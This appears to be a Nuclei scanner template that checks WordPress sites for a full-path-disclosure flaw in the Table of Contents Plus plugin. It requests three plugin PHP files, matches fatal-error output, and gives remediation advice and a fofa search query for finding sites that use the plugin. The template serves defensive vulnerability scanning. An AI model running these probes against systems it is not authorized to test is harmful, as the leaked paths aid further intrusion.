wp-toc-plus-fpd: WordPress Plugin Table of Contents Plus - Full Path Disclosure

id: wp-toc-plus-fpd

info:
  name: WordPress Plugin Table of Contents Plus - Full Path Disclosure
  author: ritikchaddha
  severity: low
  description: |
    The Table of Contents Plus WordPress plugin is vulnerable to Full Path Disclosure. This vulnerability allows attackers to view the full server path by accessing certain files or triggering error conditions, which can aid in further attacks such as directory traversal or local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to gain insights into the server's directory structure, which can be leveraged to perform further attacks such as directory traversal or local file inclusion.
  remediation: |
    Update the Table of Contents Plus plugin to the latest version. Ensure error reporting is disabled in production environments and implement proper error handling that doesn't expose full paths.
  reference:
    - https://wordpress.org/plugins/table-of-contents-plus/
    - https://wpscan.com/plugins/table-of-contents-plus/
  metadata:
    verified: true
    max-request: 3
    vendor: michael
    product: table-of-contents-plus
    fofa-query: body="wp-content/plugins/table-of-contents-plus"
  tags: wp,wordpress,wp-plugin,table-of-contents-plus,fpd,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/toc-plus.php"
      - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/toc.php"
      - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/includes/class-toc.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "undefined function", "table-of-contents-plus")'
        condition: and
# digest: 4a0a00473045022100a3574c18adc12d06c3ee13967da864af0ca25ba3cb1c6190ffd70680ea048ac102201205385e6630e4278c258db4732aaf828b5dc2c7181baf9dce9cbab21779ca7d:922c64590222798bb761d5b6d8e72950